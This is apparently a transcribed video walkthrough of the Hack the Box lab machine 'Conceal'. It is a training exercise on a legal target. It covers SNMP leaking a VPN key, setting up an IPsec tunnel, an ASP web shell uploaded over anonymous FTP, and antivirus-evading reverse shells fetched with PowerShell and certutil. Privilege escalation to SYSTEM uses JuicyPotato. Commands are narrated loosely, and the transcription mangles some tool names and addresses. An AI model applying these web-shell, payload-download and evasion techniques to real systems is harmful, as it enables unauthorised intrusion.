Hi everyone. Today I'm going to solve the box conceal from Hack the Box. So this is really very hard box. I can say that. Yeah, because it has lots of vulnerabilities which are interconnected with each other. So without wasting any time, let's jump into it. So as usual, first we are going to scan nmap -v -sc-sv for running version of running services, then ip address 10.10.1.116. Okay, so we have to use don't ping switch. Okay, so as it is running, let's see what will be the results. I'm also going to run for UDP scan nmap -v -su 10.10.10.116. so UDP requires sudo permissions, so I'll run sudo nmap and password and wait for the nmap scan results. So this box is very interesting box. So we have to connect multiple vulnerabilities to reach our destination, right? So in UDP we got a port 500 and 161 UDP, right? So we have two UDP ports, 161 and 500. So let's check in TCP, it's still running. So let's start our enumeration from snmp. So I will run a command snmp-check. Yes, we can also run that snmp walk, but my favorite one is snmp-check, then ip 10.10.10.116. so so what is snmp? First of all, let's discuss it. So snmp is nothing, it's a just simple network protocol, simple network manager protocol. So basically this protocol used by modem, routers, switches, servers, workstation to identify or monitor the administrative data basically. So if this protocol is enabled on these systems, then administrator can monitor the devices metadata, I can say that, right? So for more information about snmp, you can go to the Wikipedia. So yes, in snmp there are some vulnerabilities also there. There are 3 versions of snmp, 1, 2 and 3. But yes, before version 3 there are lots of configuration or implementation vulnerabilities in snmp. So this protocol is only implemented using read write. So if protocol is only implemented with read only permissions, then still attacker can get the very juicy information from that snmp. So the recommendations are that if snmp is not required, then please disable it. So we have some information from snmp-check. So what we get as host IP address 10.10.10.116, host name conceal, then we have description, hardware, Windows version 6.3, build. Okay, so using build version you can figure it out the operating system. Just copy the build number of the OS and paste it into the browser Google, and you will get the list of operating system of that particular build version. Then we have contact. In contact we have ike-VPN password, PSK for pre-shared key, ike stands for internet key exchange basically. So we have a pre-shared key. Okay, location, uptime, workgroup, user accounts, guest. So these are the user accounts that are enabled on that target machine. Conceal network information. Let's check our TCP ports. So here you can see we are not able to scan TCP ports, right? So now let's we have information from snmp-check. Let's see if the TCP ports are really running on the system or not. So that we can see routing information of the conceal box. Then we have TCP connections and listening ports, right? So here we can see there are lots of TCP ports which are running on the conceal box, but they are only allowed for on a tunnel, I can say that. Yeah. So here you can see UDP ports which we are able to figure it out, 506.16, and also there are also other ports. So that from here we got the idea. There is some from this IKPVPN password and the port number. We also have 500 port number. ISAKMP. ISAKMP is Internet Security Association and Key Management Protocol. Basically this protocol used in the systems to share the cryptographic keys or exchange the keys, I can say cryptographic keys, right? So if this port is open, it means there is a VPN running on that particular system, right? So for that what we have for that particular thing, we have IK and VPN password. Okay, so let's try to crack it. So I am going to crack this PSK using that online tool, that is hashes, right? For that I am going to hashes, I think the website name was hashes.org, hashes.com. So submit and search. Okay, we have to fill the captcha SPXXPLQ. Okay, so we have found the PSKs cracked, dude cake 1, right? So now move to our Kali box. Let's try to enumerate this 500 port. So this is a ICKMP. So we have tool ike-scan. Using that we can check what are the informations available with this key exchange protocol, right? So I am going to use keyscan -m 10.10.10.116. You can also use -a for the aggressive mode, but yes, I am just stuck to medium mode. So here we have little information about that HDR security association, that is encryption is 3ds hash SHA1 group MODP authentication PSK. This is very informative thing. Life type seconds, that is this is hexadecimal value. So we got the quite juicy information for the the running VPN. So basically there is a L2TP VPN which is running on the conceal box. So what we are going to try, we are going to try connect with that VPN the information we have. So right now we have that PSK key for that VPN, and we also know that the encryption methods, right? So for that we can use VPN or configure VPN. Here you can see in the box, you can check that graphically version, we have VPN that is point to point. We require L2TP, but right now we don't have here L2TP in graphical version, so we are going to switch with command line. So for that we are going to use strong 7 client to connect that that L2TP VPN right on the conceal box. For that let me go to cd home OSCP. Let me check is we have ipsec. Yes, we have ipsec. So for that, go to cd user local and etc. Yes, etc. So here etc we have some files for strong 7. I already installed the strong 7. You can just download it by apt-get install strong 7, or in the latest version of Kali Linux you also got in pre-installed, right? So we have some we have to configure 2 files to make a connectivity here. So there are 2 files, ipconfig, ipsec.config, ipsec.secrets. So first of all let me check that. So here we have 2 files, config and secrets. Let's try to edit that ipsec config. For that we need sudo permissions, yeah. So we have now try to edit gedit. I am going to first of all make changes in ipsec.secrets. So here we have to put IP address, our local IP address, that is 10.10.14.14. yes, and then target IP address. So we don't know any, maybe there are 10.10.10.166 and other also, there are other also IP addresses maybe in the local system of conceal. So we are going with the %any. It means any network subnet we are able to connect. Then we have to put semicolon, then psk. So we have the key which we have, psk key which we have decrypted. So copy it and we are going to paste it here, save, exit. Now we are going to make changes in that config file, right? So for that you can for more information regarding ipsec you can read it about strong 7 documentation file, right? So here we have to make our connection with the connection database with the VPN. So I am going to connect, just name it as, let's say, conceal. You can name it any. Then we have to put some information, which is first of all we have to type equal to transport, then key exchange. So key exchange equal to, so from the our information gathering, snmp-check and ike-scan, we have figured that the ike version which is running, that is ike version 1. So we are going to put here ike version 1. Then we will have to type here authby, as from the from checking of the ip-scan, here we can see authby psk. So we will put here authby psk. Then we have to define the IP address for from where we going to make connection, that is left stand for the then 10.10.10.116 14.14, that is our IP address. Then we have to define the port TCP or UDP. So here we are going to left protoport equal to TCP. Then we have to define the target IP address, that is 10.10.10.10.116, right protoport it will be also TCP, right? Then we have to define the encapsulation. So ESP, that is we know from the our snmp ike-scan, that is 3ds hyphen sha1. Then we have to put this sign. Then we have to define the IKE encryption, that is internet key exchange encryption, that is 3ds sha1, and that is modp 1024, which we got from here, right? So now again put the sign. Then we have to type lifetime, yeah, that would be, I think, ike lifetime. So lifetime is the, here we have second form, and life duration, this is a hexadecimal form. Now we are going to decrypt it. I am going to use hexadecimal. Yes. We are going to put convert. So we have 20, this is in the seconds, so we can say that here, yes, 20 seconds, then auto equal to start, right? So this is a configuration which we have to make in the ipsec.conf file for the strong Swan. Now save it, close it. So for run the VPN strong Swan, we are going to run ipsec start -nofork to check that the output. So here you can see we are going to connect with our VPN. So now let's try to scan the TCP ports. So we know we have 80 or 445 and 21 ports are open from our snmp-check command. So let's try to scan port snmp-p, p for 80 and -v, right? So it says 0 port. So this is TCP connect scan by default. Let's try with another switch, stealth scan. I forget the IP, 10.10.10.116. Yeah, so we got the port open, right? So now we are going to run the scan for all ports. 8445. Let me use the switches for default NSC scripts, SV for the version of running services. Let's wait for 2-3 minutes. So we have the port 80 until unless scanning is running. Let's try to explore it. ten dot 10.10.116. Okay, so we have IIS server. So let's run a directory brute force on this. Nmap hyphen directory brute force using fuzz -u for the URL, then fuzz and -w for the word list. So I'm going to use user share word list and buster directory 2.3 medium, right? it's running. I'm also, as we know, this is IIS box, so we have an idea there will be .asp or aspx files which could be there. So we are going to run again fuff for the extension u fuzz -w user share word list directory buster, then directory medium 2.3 -e for the extension, that is .asp .aspx, and so let's move to our nmap scan. Let me change it to VPN, rename it nmap. So from fuff we have found a upload directory. Let's try to explore it. Upload. So we are able to access this directory. With the extension fuff we are not able to find anything. Let's explore our nmap scan. So here you can see, using 21 FTP port, there is anonymous login is enabled on the FTP. So let's move to the terminal, rename it FTP. Rename it, just give me a moment. So try to connect with the FTP. So we have FTP 10.10.10.116 21 anonymous. Yes, we logged into as anonymous, right? So for that, for a moment, let's move to a directory, home kali conceal, OSCP conceal. So here we are going to make a file echo. This is test test.txt. So again go with the connect the FTP as anonymous, put test.txt. so text.txt file is uploaded, so refresh it. So we have the file, try to open it. Not able to get the content. Let's cd home OSCP kali OSCP conceal cat test.txt. This is test. This should be put again. Try to put here. Refresh. So we are successfully able to upload the file here. So now we are going to create a shell, .asps shell, which gives us our ability to run commands on via browser, right? So for that we are going to here gedit, let's say sh.asp. I have ASP shell code here, so you can check it out on GitHub or Google for it. So this give us a ability to run a commands, cmd commands from the browser. Okay, so remove, clear it, put sh.asp, file successfully uploaded, refresh, we have a file, open it, now we have to put here question mark cmd equal to who am I. Yes, we got the command execution here. Let's try to run PowerShell -c command then command will be who am I, and yes, we are able to also run the PowerShell here. Okay, so now what is the idea to get a reverse shell? We are going to create a msf-winome shell, reverse shell, using msf-winome, and try to upload here and try to get the reverse shell. Okay, for that let me do something like here horizontally. Okay, so we have 3-4 shells. Okay, so I'm going to run here msf-winome -p for the payload, Windows, shell, reverse underscore tcp, lhost 10.10.10.14.14, our local IP, lport equal to 190. I'm going to this one, -f for the format, exe, output would be let's say msf.exe. So if we are try to upload the msf.exe using FTP, then I don't think so we are able to access it from the that particular directory, because if we are going to this upload directory, as you can see, and refresh it, this box automatically delete our files after 30 or 40 seconds of time of span. So we are not get the reverse shell by upload this .exe file to FTP via FTP, right? So for that we have to upload it in the directory where it will not remove. For that, what I'm going to do, I'm going to create a temporary directory using our command shell which we have using .asp, and then try to upload this .msf.exe exploit using PowerShell's invoke web request, and then try to get the reverse shell for that. So I think it will take some time. Let me pause the video. So we got here our msf-winome shell is ready. So now we are going to cd OSCP, I think cd home kali OSCP conceal, and here I am going to run nclnvp 19901. Before that I am going to run Python simple HTTP web HTTP server, http.server port number 81, and if we will run the command, so connection close. So again we have to connect with FTP. So this there, as I show you, on the upload directory. This removes over all the uploaded files, and also after 40 or 45 seconds our FTP connection dead, right? So for that we have to little bit quick. For now I'm going to FTP, yes, run a FTP anonymous, enter. So we have a shell put. The name of the shell was, I forget what was the name, yeah, sh. If you refresh it you will see there are nothing, because there is no file on upload directory, right? So we are going to put sh.asp again, file uploaded. Let me check, refresh. So you know, we have to be little bit quick. For that I already make some create that PowerShell or shell commands on my notepad. I am just going to paste it here to save our time. So here you can see no, this one, copy, paste, yes. So we are creating a directory, temporary directory here. Okay, PowerShell -c is our shell is there. No, shell is deleted. Again have to upload the shell, put sh, we got the, refresh, we have the shell. Now try to run the command. I have to delete this double equal. We are going to create a temp file, temp directory. Once we got the confirmation, directory is created. Now we are going to upload the our reverse shell using command PowerShell. I am just facing little bit slowing. My system is just stucking now. So it is PowerShell command invoke web request the path URL of our that conn.exe 10.10.10.14.14.1, and it will be output in the temp.conn, right? So go to our shell is again dead. Let me copy this now. Copy this whole command and move to, yeah, my system is a little bit going stuck. I don't know why. Again uploaded. Go to the file, go to the browser, paste the link, enter. So here you can see on our server we got a hit. Okay, conceal conn.exe is not there. I think we create a MSF enum now. Okay, file name is msf.exe. My bad. msf.exe. Let me change on my notepad. msf ms.exe, copy this, go to browser, go to terminal. Shell is dead, I think so. Yeah, shell is dead. Shell msf.exe. Yeah, we got the ms.exe. Okay, so now we are going to try execute. Let me close this Chrome now. I think it's taking little much memory. So we are going to execute our shell from the from web shell. Let me remove this, paste here. Let's see, shell is dead or not. We are not getting any reverse shell, but this is executed. So this box have some restrictions and some checks. So whenever you create a reverse shell using MSF-in-home, so it will not allow to execute that file, or for that you can use Nishang, but I am going to use something else with that is phantom evasion tool, which I got from the GitHub. So using that tool you can encrypt your virus or reverse shell or make it fully undetectable. For that you have to download that phantom. So I am going to phantom. I already downloaded. You can download it from GitHub, or you can find the link in the description. So for that you have to run this command, which is let me okay, so command would be this one, python 3 phantom evasion.py, then -m msfe. I'm going to use Windows shell reverse TCP, -h for the IP address, then -p for the port number, thread, -e for memory, virtual rwxj. These are the iterations, and our final exploit would be, let's see, create it as ike.exe. Press enter. It will take some time, so let me pause the video for the moment. So hey, our exploit or reverse shell is created. Here you can see it's getting compiling. So let's again wait for 2 or 3 minutes. So our shell is compiled and saved. So if, as we know, our file name is we create it as a IK, right? So again we are going to run Python HTTP server here, and let's see, our FTP is dead. Yes, FTP is dead. So again we are going to run which one, that is FTP anonymous put sh.asp. So now I am going to directly run that command or query. on the web shell, which helps me to upload my .exe, that is invoke. So my file name is ike. I'm making changes guys on my notepad, which is on another screen, so I'll show you. Give me a moment. Copy that, go to browser, and let me refresh it. Or I don't think so there's a need of to refresh it. Yes, we have a shell, so I'm removing this one, paste that thing. We have the temporary file already there, temporary directory over there, I think, or have to again. I think I need to create again that directory. PowerShell, shell is deleted. Yes, shell is deleted. Again have to upload. Before that let me copy this. Yeah, this is pain, I know. It took me around 10 to 12 hours to solve this box. I copy it, again put sh.asp, try to refresh to save our time. Go to terminal. Yes, we got a hit. ike.exe is uploaded. Now we have to execute it. For execution, I'm going to copy this one and go to browser and try to run this command before the shell is deleted. No, conn, it would be ike. Yes, it would be ike. So fingers crossed. Temp ike, again try to run this. I think I'm making some mistake. Let me create a directory again. Directory created. Got the hit. I think file is downloaded. Now try to execute it. Not getting the reverse shell. Let me pause the video and check where is the error. I got the error. So I am trying to upload the shell from this concealed directory, whether that ike was in the phantom evasion. So now let's move to copy it, cp:/conceal. OSCP phantom Kali recipe conceal phantom IKE. So I am going to copy it here and run python 3 http server and again try to run the our shell anonymous put sh.asp then it would be copy run that. Shell deleted. Hi, welcome back. So I finally figured out how it works. So let's again try to upload the shell using FTP anonymous. Yeah, this box is really pain for me. Put sh.asp. So we have shell. Let me refresh, open it, and question. So now I'm going to upload the file using certutil directory, right, in temporary directory. So we already make a temporary directory on the this conceal box. So I'm going for the certutil. Certutil basically utility where by using we can upload or download a file in Windows, right? So this is a CMD. Press here certutil -url cache split F for the URL name, then file name, shell deleted. I think so. Yes, shell is deleted. Let me copy this URL. Okay, move to our box, upload shell, then refresh this one and move to our terminal. Yes, so here we got a hit. So now we have to run that file. So what I'm going to do, execute that IKE. I'm just removing this path and type c temp IKE exit, and we got a shell finally. So here we are going to do dir directory cd // go to the so as you can see here we have our temporary directory. So for that, let's see cd for the flag, cd users, then dir, that is cd destitute. So guys, sometimes it works for me to get a reverse shell using PowerShell, but don't know. Right now I am able to get the reverse shell using that certutil and that thing. cd, I think I'm making some typo. Then cd paste, yes, dir. So cd desktop dir. So this is our proof.txt file. So now I'm moving to the that temp folder. So now I have to have to check the privilege escalation. So first of all, who am I? That is obvious, conceal the suite. Now I am going to run the system info. Okay, so what is the version? So this is the Microsoft Windows 10 Enterprise. Okay, so now we have to check the privileges. Who am I /priv. Yes, so we have enabled SE impersonate privilege. So as you remember in our last box bounty, I think so, we used juicy potato to escalate this SE impersonate privileges. For the detailed information on SE impersonate, you can follow my that video. So now I'm going to upload here that juicy potato. So I already have in the executable in the my that conceal directory. So I'm going to download it with cert-util again. Cert-util python 3 is working. HTTP server -url cache -split -f http ://10.10.10.port 1.4 port number 81 /jp.exe. cert-util not found. Okay, dir. So we have jp.exe here. Let's try to run jp.exe. We are not okay. File, I don't think so. Conceal have that thing now. cd OSCP conceal ls. We don't have that thing, so we have to copy it from desktop no /home kali desktop. I have the box over bounty. Yes, bounty /jp. Yes, here. And again we are going to run cert-util -url cache -split -f http ://10.10.14.14:81 /jp.exe. cert-util cert-util. I just make a typo over there. URL cache -split -f http ://10.10.10.14.14:81 /jp.exe. Hope it will work for now. Yes, 200. Okay, yes. So we have jp.exe. So now we are going to run jp.exe. So there are some as you remember from the bounty walkthrough, we have to run jp.exe as -t for then star. Then we have to mention the program. So I am again here to run the same that ike-exe for the run as administrator, right? lnvp 9001. So what we are trying to do with juicy potato, we try to run that ike.exe file as an administrator, or trying to impersonate the administrator token for this particular conceal box user, right? So it will be ike.exe then -l for port number, that is 9001. So testing, it's failed. So why it's for now we have to define CLS ID for that. For now you can figure it out, just Google it, Windows 10 CLS IDs, so it will give you a list. So I have one. So for that I am going to copy it from my browser and again try to run jp.exe -t star -p for the program, then ike.exe -l 9001 -c for the CLS ID, then that CLS ID it's again filled. So now I have to again find a new one. So for that, Chrome, let's try to figure out a new CLS ID, right? So I am going to type here Windows 10 CL or what I can say, juicy potato CLS ID. So this, we have this link, Windows 10 Enterprise as from our system information command. So here we have a lot CLS IDs. So these are the anti-authority. Let's try to run this one. Let me set this into my notepad, so that would be easy for us. Okay, so now I'm copying the jp.exe command and go to our Linux box and paste clipboard, try to run that. Let's see, is it worked or not. Failed. Okay, I think I make a mistake on file name. Yes, it worked. Again try to run that by making some changes. Yes, I solved this box once, that's why I'm getting that errors. Yeah, so we are again got the shell, who am I, anti-authority, finally administrator, cd users desktop slash yes, cd users, cd desktop dir. So we have cd administrator, administrator. Yeah, I'm just dir exhauster desktop dir. So we have proof.txt. So now we are again try to upload, let me show you something. So you remember we create a reverse shell using MS7 that we name it as msf.exe, and we are trying to upload it, it was not executing. So again let me show you here. So in dir we have 3 files, ik.jp or .exe. Now try to upload that ms.txt reverse shell. Set util -url cache -split -f, then http://10.10.10.14.14:81/ that would be msf.exe. okay, so as you can see, so we have this msf.exe file here. If we try to execute it now, it will give us a error, and after 30 or 40 seconds you will see it will automatically remove from this directory. So it means we have some checks from the administrator of the creator of this box. So it identifies that signature, or I don't know how it works, or it works on the file size. But yes, I also try to increase the file size of the msf exe file and try to upload there, but it's continuously removed from the system. So I think there are some revision techniques in the MS7 GNOME which I think I should use to evaluate this thing. So in my next video I'll try to play with the MS7 GNOME for the Conceal box. Until unless, stay safe. If you have any queries, please post in the comments. Hope you like my work. Thank you.